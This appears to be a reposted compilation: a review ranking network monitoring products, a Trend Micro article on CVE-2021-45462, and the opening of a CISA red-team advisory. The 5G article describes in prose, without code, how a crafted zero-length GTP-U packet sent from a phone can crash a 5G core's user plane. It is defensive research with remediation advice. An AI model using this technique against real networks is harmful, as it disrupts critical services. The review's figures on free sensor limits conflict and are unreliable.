Auvik is a cloud-based network monitoring system. It reaches into your network, identifies all connected devices, and then creates a map. While SolarWinds Network Performance Monitor also performs those tasks, Auvik is a much lighter tool that you don’t have to host yourself and you don’t need deep technical knowledge to watch over a network with this automated system.

Auvik’s network monitoring system is automated, thanks to its system of thresholds. The service includes out-of-the-box thresholds that are placed on most of the metrics that the network monitor tracks. It is also possible to create custom thresholds.

Once the monitoring service is operating, if any of the thresholds are crossed, the system raises an alert. This mechanism allows technicians to get on with other tasks, knowing that the thresholds give them time to avert system performance problems that would be noticeable to users.

Network management tools that are included in the Auvik package include configuration management to standardize the settings of network devices and prevent unauthorized changes.

The processing power for Auvik is provided by the service’s cloud servers. However, the system requires collectors to be installed on each monitored site. This software runs on Windows Server and Ubuntu Linux. It is also possible to run the collector on a VM. Wherever the collector is located, the system manager still accesses the service’s console, which is based on the Auvik server, through any standard Web browser.

Who is it recommended for?

Smaller businesses that don’t have a team to support IT would benefit from Auvik. It needs no software maintenance and the system provides automated alerts when issues arise, so your few IT staff can get on with supporting other resources while Auvik looks after the network.

PROS:

  • A specialized network monitoring tool
  • Additional network management utilities
  • Configuration management included
  • A cloud-based service that is accessible from anywhere through any standard Web browser
  • Data collectors for Windows Server and Ubuntu Linux

CONS:

  • The system isn’t expandable with any other Auvik modules

Auvik doesn’t publish its prices by you can access a 14-day free trial.

EDITOR’S CHOICE

Auvik is our top pick for a network monitoring tool because it is a hosted SaaS package that provides all of your network monitoring needs without you needing to maintain the software. The Auvik platform installs an agent on your site and then sets itself up by scanning the network and identifying all devices. The inventory that this system generates gives you details of all of your equipment and provides a basis for network topology maps. Repeated checks on the network gather performance statistics and if any metric crosses a threshold, the tool will generate an alert.  You can centralize the monitoring of multiple sites with this service.

Download: Get a 14-day FREE Trial

Official Site: https://www.auvik.com/#trial

OS: Cloud-based

2. PRTG Network Monitor from Paessler – FREE TRIAL

PRTG Network Monitor

PRTG Network Monitor software is commonly known for its advanced infrastructure management capabilities. All devices, systems, traffic, and applications in your network can be easily displayed in a hierarchical view that summarizes performance and alerts. PRTG monitors the entire IT infrastructure using technology such as SNMP, WMI, SSH, Flows/Packet Sniffing, HTTP requests, REST APIs, Pings, SQL, and a lot more.

Key Features:

  • Autodiscovery that creates and maintains a device inventory
  • Live network topology maps are available in a range of formats
  • Monitoring for wireless networks as well as LANs
  • Multi-site monitoring capabilities
  • SNMP sensors to gather device health information
  • Ping to check on device availability
  • Optional extra sensors to monitor servers and applications
  • System-wide status overviews and drill-down paths for individual device details
  • A protocol analyzer to identify high-traffic applications
  • A packet sniffer to collect packet headers for analysis
  • Color-coded graphs of live data in the system dashboard
  • Capacity planning support
  • Alerts on device problems, resource shortages, and performance issues
  • Notifications generated from alerts that can be sent out by email or SMS
  • Available for installation on Windows Server or as a hosted cloud service

Why do we recommend it?

Paessler PRTG Network Monitor is a very flexible package. Not only does it monitor networks, but it can also monitor endpoints and applications. The PRTG system will discover and map your network, creating a network inventory, which is the basis for automated monitoring. You put together your ideal monitoring system by choosing which sensors to turn on. You pay for an allowance of sensors.

It is one of the best choices for organizations with low experience in network monitoring software. The user interface is really powerful and very easy to use.

A very particular feature of PRTG is its ability to monitor devices in the data center with a mobile app. A QR code that corresponds to the sensor is printed out and attached to the physical hardware. The mobile app is used to scan the code and a summary of the device is displayed on the mobile screen.

In summary, Paessler PRTG is a flexible package of sensors that you can tailor to your own needs by deciding which monitors to activate. The SNMP-based network performance monitoring routines include an autodiscovery system that generates a network asset inventory and topology maps. You can also activate traffic monitoring features that can communicate with switches through NetFlow, sFlow, J-Flow, and IPFIX. QoS and NBAR features enable you to keep your time-sensitive applications working properly.

Who is it recommended for?

PRTG is available in a Free edition, which is limited to 100 sensors. This is probably enough to support a small network. Mid-sized and large organizations should be interested in paying for larger allowances of sensors. The tool can even monitor multiple sites from one location.

PROS:

  • Uses a combination of packet sniffing, WMI, and SNMP to report network performance data
  • Fully customizable dashboard is great for both lone administrators as well as NOC teams
  • Drag and drop editor makes it easy to build custom views and reports
  • Supports a wide range of alert mediums such as SMS, email, and third-party integrations into platforms like Slack
  • Each sensor is specifically designed to monitor each application, for example, there are prebuilt sensors whose specific purpose is to capture and monitor VoIP activity
  • Supports a freeware version

CONS:

  • Is a very comprehensive platform with many features and moving parts that require time to learn

PRTG has a very flexible pricing plan, to get an idea visit their official pricing webpage below. It is free to use for up to 50 sensors. Beyond that you get a 30-day free trial to figure out your network requirements.

Paessler PRTGDownload a 30-day FREE Trial

3. SolarWinds Network Performance Monitor – FREE TRIAL

SolarWinds Network Performance Monitor with Free Trial

SolarWinds Network Performance Monitor is easy to setup and can be ready in no time. The tool automatically discovers network devices and deploys within an hour. Its simple approach to oversee an entire network makes it one of the easiest to use and most intuitive user interfaces.

Key Features:

  • Automatically Network Discovery and Scanning for Wired and Wifi Computers and Devices
  • Support for Wide Array of OEM Vendors
  • Forecast and Capacity Planning
  • Quickly Pinpoint Issues with Network Performance with NetPath™ Critical Path visualization feature
  • Easy to Use Performance Dashboard to Analyze Critical Data points and paths across your network
  • Robust Alerting System with options for Simple/Complex Triggers
  • Monitor CISCO ASA networks with their New Network Insight™ for CISCO ASA
  • Monitor ACL‘s, VPN, Interface and Monitor on your Cisco ASA
  • Monitor Firewall rules through Firewall Rules Browser
  • Hop by Hop Analysis of Critical Network Paths and Components
  • Automatically Discover Networks and Map them along with Topology Views
  • Manage, Monitor and Analyze Wifi Networks within the Dashboard
  • Create HeatMaps of Wifi Networks to pin-point Wifi Dead Spots
  • Monitor Hardware Health of all Servers, Firewalls, Routers, Switches, Desktops, laptops and more
  • Real-Time Network and Netflow Monitoring for Critical Network Components and Devices

Why do we recommend it?

SolarWinds Network Performance Monitor is the leading network monitoring tool in the world and this is the system that the other monitor providers are chasing. Like many other network monitors, this system uses the Simple Network Management Protocol (SNMP) to gather reports on network devices. The strength of SolarWinds lies in the deep technical knowledge of its support advisors, which many other providers lack.

The product is highly customizable and the interface is easy to manage and change very quickly. You can customize the web-based performance dashboards, charts, and views. You can design a tailored topology for your entire network infrastructure. You can also create customized dependency-aware intelligent alerts and much more.

SolarWinds NPM Application Summary

The software is sold by separate modules based on what you use. SolarWinds Network Performance Monitor Price starts from $1,995 and is a one-time license including 1st-year maintenance.

SolarWinds NPM has an Extensive Feature list that make it One of the Best Choices for Network Monitoring Solutions

SolarWinds NPM is able to track the performance of networks autonomously through the use of SNMP procedures, producing alerts when problems arise. Alerts are generated if performance dips and also in response to emergency notifications sent out by device agents. This system means that technicians don’t have to watch the monitoring screen all the time because they know that they will be drawn back to fix problems by an email or SMS notification.

SolarWinds NPM - NetPath Screenshot
NetPath Screenshot

Who is it recommended for?

SolarWinds Network Performance Monitor is an extensive network monitoring system and it is probably over-engineered for use by a small business. Mid-sized and large companies would benefit from using this tool.

PROS:

  • Supports auto-discovery that builds network topology maps and inventory lists in real-time based on devices that enter the network
  • Has some of the best alerting features that balance effectiveness with ease of use
  • Supports both SNMP monitoring as well as packet analysis, giving you more control over monitoring than similar tools
  • Uses drag and drop widgets to customize the look and feel of the dashboard
  • Tons of pre-configured templates, reports, and dashboard views

CONS:

  • This is a feature-rich enterprise tool designed for sysadmin, non-technical users may some features overwhelming

You can start with a 30-day free trial.

SolarWinds NPMDownload a 30-day FREE Trial!

4. Checkmk – FREE TRIAL

Checkmk Uplink Bandwidth Graph

Checkmk is an IT asset monitoring package that has the ability to watch over networks, servers, services, and applications. The network monitoring facilities in this package provide both network device status tracking and network traffic monitoring.

Features of this package include:

  • Device discovery that cycles continuously, spotting new devices and removing retired equipment
  • Creation of a network inventory
  • Registration of switches, routers, firewalls, and other network devices
  • Creation of a network topology map
  • Continuous device status monitoring with SNMP
  • SNMP feature report focus for small businesses
  • Performance thresholds with alerts
  • Wireless network monitoring
  • Protocol analysis
  • Traffic throughput statistics per link
  • Switch port monitoring
  • Gateway transmission speed tracking
  • Network traffic data extracted with ntop
  • Can monitor a multi-vendor environment

Why do we recommend it?

The Checkmk combination of network device monitoring and traffic monitoring in one tool is rare. Most network monitoring service creators split those two functions so that you have to buy two separate packages. The Checkmk system also gives you application and server monitoring along with the network monitoring service.

The Checkmk system is easy to set up, thanks to its autodiscovery mechanism. This is based on SNMP. The program will act as an SNMP Manager, send out a broadcast requesting reports from device agents, and then compile the results into an inventory. The agent is the Checkmk package itself if you choose to install the Linux version or it is embedded on a device if you go for the hardware option. If you choose the Checkmk Cloud SaaS option, that platform will install an agent on one of your computers.

The SNMP Manager constantly re-polls for device reports and the values in these appear in the Checkmk device monitoring screen. The platform also updates its network inventory according to the data sent back by device agents in each request/response round. The dashboard also generates a network topology map from information in the inventory. So, that map updates whenever the inventory changes.

Checkmk Network Topology

While gathering information through SNMP, the tool also scans the headings of passing packets on the network to compile traffic statistics. Basically, the tool provides a packet count which enables it to quickly calculate a traffic throughput rate. Data can also be segmented per protocol, according to the TCP port number in each header.

Who is it recommended for?

Checkmk has a very wide appeal because of its three editions. Checkmk Raw is free and will appeal to small businesses. This is an adaptation of Nagios Core. The paid version of the system is called Checkmk Enterprise and that is designed for mid-sized and large businesses. Checkmk Cloud is a SaaS option.

PROS:

  • Provides both network device monitoring and traffic tracking
  • Automatically discovers devices and creates a network inventory
  • Free version available
  • Options for on-premises or SaaS delivery
  • Monitors wireless networks as well as LANs
  • Available for installation on Linux or as an appliance

CONS:

  • Provides a lot of screens to look through

Start a 30-day free trial.

CheckmkStart 30-day FREE Trial

5. Datadog Network Monitoring – FREE TRIAL

Datadog App Performance

Datadog Network Monitoring supervises the performance of network devices. The service is a cloud-based system that is able to explore a network and detect all connected devices. With the information from this research, the network monitor will create an asset inventory and draw up a network topology map. This procedure means that the system performs its own setup routines.

Features of this package include:

  • Monitors networks anywhere, including remote sites
  • Joins together on-premises and cloud-based resource monitoring
  • Integrates with other Datadog modules, such as log management
  • Offers an overview of all network performance and drill-down details of each device
  • Facilitates troubleshooting by identifying performance dependencies
  • Includes DNS server monitoring
  • Gathers SNMP device reports
  • Blends performance data from many information sources
  • Includes data flow monitoring
  • Offers tag-based packet analysis utilities in the dashboard
  • Integrates protocol analyzers
  • Performance threshold baselining based on machine learning
  • Alerts for warnings over evolving performance issues
  • Packages offer network performance monitoring tools (traffic analysis) or network device monitoring
  • Subscription charges with no startup costs

Why do we recommend it?

Datadog Network Monitoring services are split into two modules that are part of a cloud platform of many system monitoring and management tools. These two packages are called Network Performance Monitoring and Network Device Monitoring, which are both subscription services. While the device monitoring package works through SNMP, the performance monitor measures network traffic levels.

The autodiscovery process is ongoing, so it spots any changes you make to your network and instantly updates the inventory and the topology map. The service can also identify virtual systems and extend monitoring of links out to cloud resources.

Datadog Network Monitoring

Datadog Network Monitoring provides end-to-end visibility of all connections, which are also correlated with performance issues highlighted in log messages. The dashboard for the system is resident in the cloud and accessed through any standard browser. This centralizes network performance data from many sources and covers the entire network, link by link and end to end.

You can create custom graphs, metrics, and alerts in an instant, and the software can adjust them dynamically based on different conditions. Datadog prices start from free (up to five hosts), Pro $15/per host, per month and Enterprise $23 /per host, per month.

Who is it recommended for?

The two Datadog network monitoring packages are very easy to sign up for. They work well together to get a complete view of network activities. The pair will discover all of the devices on your network and map them, then startup automated monitoring. These are very easy-to-use systems that are suitable for use by any size of business.

PROS:

  • Has one of the most intuitive interfaces among other network monitoring tools
  • Cloud-based SaaS product allows monitoring with no server deployments or onboarding costs
  • Can monitor both internally and externally giving network admins a holistic view of network performance and accessibility
  • Supports auto-discovery that builds network topology maps on the fly
  • Changes made to the network are reflected in near real-time
  • Allows businesses to scale their monitoring efforts reliably through flexible pricing options

CONS:

  • Would like to see a longer trial period for testing

Start a 14-day free trial.

DatadogStart a 14-day FREE Trial

6. ManageEngine OpManager – FREE TRIAL

ManageEngine OpManager Linux Network Monitoring

At its core, ManageEngine OpManager is infrastructure management, network monitoring, and application performance management “APM” (with APM plug-in) software.

Key Features:

  • Includes server monitoring as well as network monitoring
  • Autodiscovery function for automatic network inventory assembly
  • Constant checks on device availability
  • A range of network topology map options
  • Automated network mapping
  • Performs an SNMP manager role, constantly polling for device health statuses
  • Receives SNMP Traps and generates alerts when device problems arise
  • Implements performance thresholds and identifies system problems
  • Watches over resource availability
  • Customizable dashboard with color-coded dials and graphs of live data
  • Forwards alerts to individuals by email or SMS
  • Available for Windows Server and Linux
  • Can be enhanced by an application performance monitor to create a full stack supervisory system
  • Free version available
  • Distributed version to supervise multiple sites from one central location

Why do we recommend it?

ManageEngine OpManager is probably the biggest threat to SolarWind’s leading position. This package monitors servers as well as networks. This makes it a great system for monitoring virtualizations.

When it comes to network management tools, this product is well balanced when it comes to monitoring and analysis features.

The solution can manage your network, servers, network configuration, and fault & performance; It can also analyze your network traffic. To run Manage Engine OpManager, it must be installed on-premises.

A highlight of this product is that it comes with pre-configured network monitor device templates. These contain pre-defined monitoring parameters and intervals for specific device types.
The essential edition product can be purchased for $595 which allows up to 25 devices.

Who is it recommended for?

A nice feature of OpManager is that it is available for Linux as well as Windows Server for on-premises installation and it can also be used as a service on AWS or Azure for businesses that don’t want to run their own servers. The pricing for this package is very accessible for mid-sized and large businesses. Small enterprises with simple networks should use the Free edition, which is limited to covering a network with three connected devices.

PROS:

  • Designed to work right away, features over 200 customizable widgets to build unique dashboards and reports
  • Leverages autodiscovery to find, inventory, and map new devices
  • Uses intelligent alerting to reduce false positives and eliminate alert fatigue across larger networks
  • Supports email, SMS, and webhook for numerous alerting channels
  • Integrates well in the ManageEngine ecosystem with their other products

CONS:

  • Is a feature-rich tool that will require a time investment to properly learn

Start 30-day free trial.

ManageEngine OpManagerDownload a 30-day FREE Trial

7. NinjaOne RMM – FREE TRIAL

NinjaOne Endpoint Management

NinjaOne is a remote monitoring and management (RMM) package for managed service providers (MSPs). The system reaches out to each remote network through the installation of an agent on one of its endpoints. The agent acts as an SNMP Manager.

Key Features:

  • Based on the Simple Network Management Protocol
  • SNMP v1, 2, and 3
  • Device discovery and inventory creation
  • Continuous status polling for network devices and endpoints
  • Live traffic data with NetFlow, IPFIX, J-Flow, and sFlow
  • Traffic throughput graphs
  • Customizable detail display
  • Performance graphs
  • Switch port mapper
  • Device availability checks
  • Syslog processing for device status reports
  • Customizable alerts
  • Notifications by SMS or email
  • Related endpoint monitoring and management

Why do we recommend it?

NinjaOne RMM enables each technician to support multiple networks simultaneously. The alerting mechanism in the network monitoring service means that you can assume that everything is working fine on a client’s system unless you receive a notification otherwise. The network tracking service sets itself up automatically with a discovery routine.

The full NinjaOne RMM package provides a full suite of tools for administering a client’s system. The network monitoring service is part of that bundle along with endpoint monitoring and patch management.

The Ninja One system onboards a new client site automatically through a discovery service that creates both hardware and software inventories. The data for each client is kept separate in a subaccount. Technicians that need access to that client’s system for investigation need to be set up with credentials.

The network monitoring system provides both device status tracking and network traffic analysis. The service provides notifications if a dive goes offline or throughput drops.

Who is it recommended for?

This service is built with a multi-tenant architecture for use by managed service providers. However, IT departments can also use the system to manage their own networks and endpoints. The service is particularly suitable for simultaneously monitoring multiple sites. The console for the RMM is based in the cloud and accessed through any standard Web browser.

PROS:

  • A cloud-based package that onboards sites through the installation of an agent
  • Auto discovery for network devices and endpoints
  • Network device status monitoring
  • Network traffic analysis
  • Syslog message scanning

CONS:

  • No price list

NinjaOne doesn’t publish a price list so you start your buyer’s journey by accessing a 14-day free trial.

NinjaOneStart a 14-day FREE Trial

8. Site24x7 Network Monitoring – FREE TRIAL

Site24x7 Network Performance Monitor

Site24x7 is a monitoring service that covers networks, servers, and applications. The network monitoring service in this package starts off by exploring the network for connected devices. IT logs its findings in a network inventory and draws up a network topology map.

Key Features:

  • A hosted cloud-based service that includes CPU time and performance data storage space
  • Can unify the monitoring of networks on site all over the world
  • Uses SNMP to check on device health statuses
  • Gives alerts on resource shortages, performance issues, and device problems
  • Generates notifications to forward alerts by email or SMS
  • Root cause analysis features
  • Autodiscovery for a constantly updated network device inventory
  • Automatic network topology mapping
  • Includes internet performance monitoring for utilities such as VPNs
  • Specialized monitoring routines for storage clusters
  • Monitors boundary and edge services, such as load balancers
  • Offers overview and detail screens showing the performance of the entire network and also individual devices
  • Includes network traffic flow monitoring
  • Facilities for capacity planning and bottleneck identification
  • Integrates with application monitoring services to create a full stack service

Why do we recommend it?

Site24x7 Network Monitoring is part of a platform that is very similar to Datadog. A difference lies in the number of modules that Site24x7 offers – it has far fewer than Datadog. Site24x7 bundles its modules into packages with almost all plans providing monitoring for networks, servers, services, applications, and websites. Site24x7 was originally developed to be a SaaS plan for ManageEngine but then was split out into a separate brand, so there is very solid expertise behind this platform.

The Network Monitor uses procedures from the Simple Network Management Protocol (SNMP) to poll devices every minute for status reports. Any changes in the network infrastructure that are revealed by these responses update the inventory and topology map.

The results of the device responses are interpreted into live data in the dashboard of the monitor. The dashboard is accessed through any standard browser and its screens can be customized by the user.

The SNMP system empowers device agents to send out a warning without waiting for a request if it detects a problem with the device that it is monitoring. Site24x7 Infrastructure catches these messages, which are called Traps, and generates an alert. This alert can be forwarded to technicians by SMS, email, voice call, or instant messaging post.

The Network Monitor also has a traffic analysis function. This extracts throughput figures from switches and routers and displays data flow information in the system dashboard. This data can also be used for capacity planning.

Who is it recommended for?

The plans for Site24x7 are very reasonably priced, which makes them accessible to businesses of all sizes. Setup for the system is automated and much of the ongoing monitoring processes are carried out without any manual intervention.

PROS:

  • One of the most holistic monitoring tools available, supporting networks, infrastructure, and real user monitoring in a single platform
  • Uses real-time data to discover devices and build charts, network maps, and inventory reports
  • Is one of the most user-friendly network monitoring tools available
  • User monitoring can help bridge the gap between technical issues, user behavior, and business metrics
  • Supports a freeware version for testing

CONS:

  • Is a very detailed platform that will require time to fully learn all of its features and options

Site24x7 costs $9 per month when paid annually. It is available for a free trial.

Site24x7Get the FREE Trial

9. Atera – FREE TRIAL

Atera Screenshot

Atera is a package software that was built for managed service providers. It is a SaaS platform and it includes professional service automation (PSA) and remote monitoring and management (RMM) systems.

Why do we recommend it?

Atera is a package of tools for managed service providers (MSPs). Alongside remote network monitoring capabilities, this package provides automated monitoring services for all IT operations. The package also includes some system management tools, such as a patch manager. Finally, the Atera platform offers Professional Services Automation (PSA) tools to help the managers of MSPs to run their businesses.

The network monitoring system operates remotely through an agent that installs on Windows Server. The agent enables the service to scour the network and identify all of the network devices that run it. This is performed using SNMP, with the agent acting as the SNMP Manager.

The SNMP system enables the agent to spot Traps, which warn of device problems. These are sent to the Atera network monitoring dashboard, where they appear as alerts. Atera offers an automated topology mapping service, but this is an add-on to the main subscription packages.

Who is it recommended for?

Atera charges for its platform per technician, so it is very affordable for MSPs of all sizes. This extends to sole technicians operating on a contract basis and possibly fielding many small business clients.

PROS:

  • Remote automated network discovery
  • Network performance monitoring with SNMP
  • Alerts for notified device problems
  • Also includes remote system management tools
  • Scalable pricing with three plan levels
  • 30-day free trial

CONS:

  • Network mapping costs extra

You can start a 30-day free trial.

AteraStart 30-day Free Trial

10. ManageEngine RMM Central – FREE TRIAL

ManageEngine RMM Central

ManageEngine RMM Central provides sysadmins with everything they need to support their network. Automated asset discovery makes deployment simple, allowing you to collect all devices on your network by the end of the day.

Key Features

  • Automated network monitoring and asset discovery
  • Built-in remote access with various troubleshooting tools
  • Flexible alert integrations

With network and asset metrics collected, administrators can quickly see critical insights automatically generated by the platform. With over 100 automated reports it’s easy to see exactly where your bottlenecks are and what endpoints are having trouble.

Administrators can configure their own SLAs with various automated alert options and even pair those alerts with other automation that integrate into their helpdesk workflow.

PROS:

  • Uses a combination of packet sniffing, WMI, and SNMP to report network performance data
  • Fully customizable dashboard is great for both lone administrators as well as NOC teams
  • Drag and drop editor makes it easy to build custom views and reports
  • Supports a wide range of alert mediums such as SMS, email, and third-party integrations into platforms like Slack

CONS:

  • Is a very comprehensive platform with many features and moving parts that require time to learn

Start a 30-day free trial.

source :
https://www.pcwdld.com/network-monitoring-tools-software/

Attacks on 5G Infrastructure From Users’ Devices

By: Salim S.I.
September 20, 2023
Read time: 8 min (2105 words)

Crafted packets from cellular devices such as mobile phones can exploit faulty state machines in the 5G core to attack cellular infrastructure. Smart devices that critical industries such as defense, utilities, and the medical sectors use for their daily operations depend on the speed, efficiency, and productivity brought by 5G. This entry describes CVE-2021-45462 as a potential use case to deploy a denial-of-service (DoS) attack to private 5G networks.

5G unlocks unprecedented applications previously unreachable with conventional wireless connectivity to help enterprises accelerate digital transformation, reduce operational costs, and maximize productivity for the best return on investments. To achieve its goals, 5G relies on key service categories: massive machine-type communications (mMTC), enhanced mobile broadband (eMBB), and ultra-reliable low-latency communication (uRLLC).

With the growing spectrum for commercial use, usage and popularization of private 5G networks are on the rise. The manufacturing, defense, ports, energy, logistics, and mining industries are just some of the earliest adopters of these private networks, especially for companies rapidly leaning on the internet of things (IoT) for digitizing production systems and supply chains. Unlike public grids, the cellular infrastructure equipment in private 5G might be owned and operated by the user-enterprise themselves, system integrators, or by carriers. However, given the growing study and exploration of the use of 5G for the development of various technologies, cybercriminals are also looking into exploiting the threats and risks that can be used to intrude into the systems and networks of both users and organizations via this new communication standard. This entry explores how normal user devices can be abused in relation to 5G’s network infrastructure and use cases.

5G topology

In an end-to-end 5G cellular system, user equipment (aka UE, such as mobile phones and internet-of-things [IoT] devices), connect to a base station via radio waves. The base station is connected to the 5G core through a wired IP network.

Functionally, the 5G core can be split into two: the control plane and the user plane. In the network, the control plane carries the signals and facilitates the traffic based on how it is exchanged from one endpoint to another. Meanwhile, the user plane functions to connect and process the user data that comes over the radio area network (RAN).

The base station sends control signals related to device attachment and establishes the connection to the control plane via NGAP (Next-Generation Application Protocol). The user traffic from devices is sent to the user plane using GTP-U (GPRS tunneling protocol user plane). From the user plane, the data traffic is routed to the external network. 

fig1-attacks-on-5g-infrastructure-from-users-devices
Figure 1. The basic 5G network infrastructure

The UE subnet and infrastructure network are separate and isolated from each other; user equipment is not allowed to access infrastructure components. This isolation helps protect the 5G core from CT (Cellular Technology) protocol attacks generated from users’ equipment.

Is there a way to get past this isolation and attack the 5G core? The next sections elaborate on the how cybercriminals could abuse components of the 5G infrastructure, particularly the GTP-U.

GTP-U

GTP-U is a tunneling protocol that exists between the base station and 5G user plane using port 2152. The following is the structure of a user data packet encapsulated in GTP-U.

fig2-attacks-on-5g-infrastructure-from-users-devices
Figure 2. GTP-U data packet

A GTP-U tunnel packet is created by attaching a header to the original data packet. The added header consists of a UDP (User Datagram Protocol) transport header plus a GTP-U specific header. The GTP-U header consists of the following fields:

  • Flags: This contains the version and other information (such as an indication of whether optional header fields are present, among others).
  • Message type: For GTP-U packet carrying user data, the message type is 0xFF.
  • Length: This is the length in bytes of everything that comes after the Tunnel Endpoint Identifier (TEID) field.
  • TEID: Unique value for a tunnel that maps the tunnel to user devices

The GTP-U header is added by the GTP-U nodes (the base station and User Plane Function or UPF). However, the user cannot see the header on the user interface of the device. Therefore, user devices cannot manipulate the header fields.

Although GTP-U is a standard tunneling technique, its use is mostly restricted to CT environments between the base station and the UPF or between UPFs. Assuming the best scenario, the backhaul between the base station and the UPF is encrypted, protected by a firewall, and closed to outside access. Here is a breakdown of the ideal scenario: GSMA recommends IP security (IPsec) between the base station and the UPF. In such a scenario, packets going to the GTP-U nodes come from authorized devices only. If these devices follow specifications and implement them well, none of them will send anomalous packets. Besides, robust systems are expected to have strong sanity checks to handle received anomalies, especially obvious ones such as invalid lengths, types, and extensions, among others.

In reality, however, the scenario could often be different and would require a different analysis altogether. Operators are reluctant to deploy IPsec on the N3 interface because it is CPU-intensive and reduces the throughput of user traffic. Also, since the user data is perceived to be protected at the application layer (with additional protocols such as TLS or Transport Layer Security), some consider IP security redundant. One might think that for as long as the base station and packet-core conform to the specific, there will be no anomalies. Besides, one might also think that for all robust systems require sanity checks to catch any obvious anomalies. However, previous studies have shown that many N3 nodes (such as UPF) around the world, although they should not be, are exposed to the internet. This is shown in the following sections.

fig3-attacks-on-5g-infrastructure-from-users-devices

Figure 3. Exposed UPF interfaces due to misconfigurations or lack of firewalls; screenshot taken from Shodan and used in a previously published research

We discuss two concepts that can exploit the GTP-U using CVE-2021-45462. In Open5GS, a C-language open-source implementation for 5G Core and Evolved Packet Core (EPC), sending a zero-length, type=255 GTP-U packet from the user device resulted in a denial of service (DoS) of the UPF. This is CVE-2021-45462, a security gap in the packet core that can crash the UPF (in 5G) or Serving Gateway User Plane Function (SGW-U in 4G/LTE) via an anomalous GTP-U packet crafted from the UE and by sending this anomalous GTP-U packet in the GTP-U. Given that the exploit affects a critical component of the infrastructure and cannot be resolved as easily, the vulnerability has received a Medium to High severity rating.

GTP-U nodes: Base station and UPF

GTP-U nodes are endpoints that encapsulate and decapsulate GTP-U packets. The base station is the GTP-U node on the user device side. As the base station receives user data from the UE, it converts the data to IP packets and encapsulates it in the GTP-U tunnel.

The UPF is the GTP-U node on the 5G core (5GC) side. When it receives a GTP-U packet from the base station, the UPF decapsulates the outer GTP-U header and takes out the inner packet. The UPF looks up the destination IP address in a routing table (also maintained by the UPF) without checking the content of the inner packet, after which the packet is sent on its way.

GTP-U in GTP-U

What if a user device crafts an anomalous GTP-U packet and sends it to a packet core?

fig4-attacks-on-5g-infrastructure-from-users-devices
Figure 4. A specially crafted anomalous GTP-U packet
fig5-attacks-on-5g-infrastructure-from-users-devices
Figure 5. Sending an anomalous GTP-U packet from the user device

As intended, the base station will tunnel this packet inside its GTP-U tunnel and send to the UPF. This results in a GTP-U in the GTP-U packet arriving at the UPF. There are now two GTP-U packets in the UPF: The outer GTP-U packet header is created by the base station to encapsulate the data packet from the user device. This outer GTP-U packet has 0xFF as its message type and a length of 44. This header is normal. The inner GTP-U header is crafted and sent by the user device as a data packet. Like the outer one, this inner GTP-U has 0xFF as message type, but a length of 0 is not normal.

The source IP address of the inner packet belongs to the user device, while the source IP address of the outer packet belongs to the base station. Both inner and outer packets have the same destination IP address: that of the UPF.

The UPF decapsulates the outer GTP-U and passes the functional checks. The inner GTP-U packet’s destination is again the same UPF. What happens next is implementation-specific:

  • Some implementations maintain a state machine for packet traversal. Improper implementation of the state machine might result in processing this inner GTP-U packet. This packet might have passed the checks phase already since it shares the same packet-context with the outer packet. This leads to having an anomalous packet inside the system, past sanity checks.
  • Since the inner packet’s destination is the IP address of UPF itself, the packet might get sent to the UPF. In this case, the packet is likely to hit the functional checks and therefore becomes less problematic than the previous case.

Attack vector

Some 5G core vendors leverage Open5GS code. For example, NextEPC (4G system, rebranded as Open5GS in 2019 to add 5G, with remaining products from the old brand) has an enterprise offer for LTE/5G, which draws from Open5GS’ code. No attacks or indications of threats in the wild have been observed, but our tests indicate potential risks using the identified scenarios.

The importance of the attack is in the attack vector: the cellular infrastructure attacks from the UE. The exploit only requires a mobile phone (or a computer connected via a cellular dongle) and a few lines of Python code to abuse the opening and mount this class of attack. The GTP-U in GTP-U attacks is a well-known technique, and backhaul IP security and encryption do not prevent this attack. In fact, these security measures might hinder the firewall from inspecting the content.

Remediation and insights

Critical industries such as the medical and utility sectors are just some of the early adopters of private 5G systems, and its breadth and depth of popular use are only expected to grow further. Reliability for continuous, uninterrupted operations is critical for these industries as there are lives and real-world implications at stake. The foundational function of these sectors are the reason that they choose to use a private 5G system over Wi-Fi. It is imperative that private 5G systems offer unfailing connectivity as a successful attack on any 5G infrastructure could bring the entire network down.

In this entry, the abuse of CVE-2021-45462 can result in a DoS attack. The root cause of CVE-2021-45462 (and most GTP-U-in-GTP-U attacks) is the improper error checking and error handling in the packet core. While GTP-U-in-GTP-U itself is harmless, the proper fix for the gap has to come from the packet-core vendor, and infrastructure admins must use the latest versions of the software.

A GTP-U-in-GTP-U attack can also be used to leak sensitive information such as the IP addresses of infrastructure nodes. GTP-U peers should therefore be prepared to handle GTP-U-in-GTP-U packets. In CT environments, they should use an intrusion prevention system (IPS) or firewalls that can understand CT protocols. Since GTP-U is not normal user traffic, especially in private 5G, security teams can prioritize and drop GTP-U-in-GTP-U traffic.

As a general rule, the registration and use of SIM cards must be strictly regulated and managed. An attacker with a stolen SIM card could insert it to an attacker’s device to connect to a network for malicious deployments. Moreover, the responsibility of security might be ambiguous to some in a shared operating model, such as end-devices and the edge of the infrastructure chain owned by the enterprise. Meanwhile, the cellular infrastructure is owned by the integrator or carrier. This presents a hard task for security operation centers (SOCs) to bring relevant information together from different domains and solutions.

In addition, due to the downtime and tests required, updating critical infrastructure software regularly to keep up with vendor’s patches is not easy, nor will it ever be. Virtual patching with IPS or layered firewalls is thus strongly recommended. Fortunately, GTP-in-GTP is rarely used in real-world applications, so it might be safe to completely block all GTP-in-GTP traffic. We recommend using layered security solutions that combine IT and communications technology (CT) security and visibility. Implementing zero-trust solutions, such as Trend Micro™ Mobile Network Security, powered by CTOne, adds another security layer for enterprises and critical industries to prevent the unauthorized use of their respective private networks for a continuous and undisrupted industrial ecosystem, and by ensuring that the SIM is used only from an authorized device. Mobile Network Security also brings CT and IT security into a unified visibility and management console.

Source :
https://www.trendmicro.com/it_it/research/23/i/attacks-on-5g-infrastructure-from-users-devices.html

CISA Red Team Shares Key Findings to Improve Monitoring and Hardening of Networks

Release Date February 28, 2023
Alert CodeAA23-059A

SUMMARY

The Cybersecurity and Infrastructure Security Agency (CISAis releasing this Cybersecurity Advisory (CSAdetailing activity and key findings from a recent CISA red team assessmentin coordination with the assessed organizationto provide network defenders recommendations for improving their organization’s cyber posture.

Actions to take today to harden your local environment:

  • Establish a security baseline of normal network activity; tune network and host-based appliances to detect anomalous behavior.
  • Conduct regular assessments to ensure appropriate procedures are created and can be followed by security staff and end users.
  • Enforce phishing-resistant MFA to the greatest extent possible.

